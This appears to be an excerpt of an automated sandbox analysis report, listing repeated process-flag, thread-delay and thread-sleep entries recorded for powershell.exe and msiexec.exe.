Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599866	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599745	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598997	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596782	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595216	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7069			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2624			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5472	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7132	Thread sleep count: 1597 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -599866s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7132	Thread sleep count: 8224 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -599745s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -599610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -599485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -599360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -599235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -598997s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -598532s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -598407s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -598282s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -597218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -596782s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -596657s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -596532s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -596407s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -595813s >= -30000s	Jump to behavior
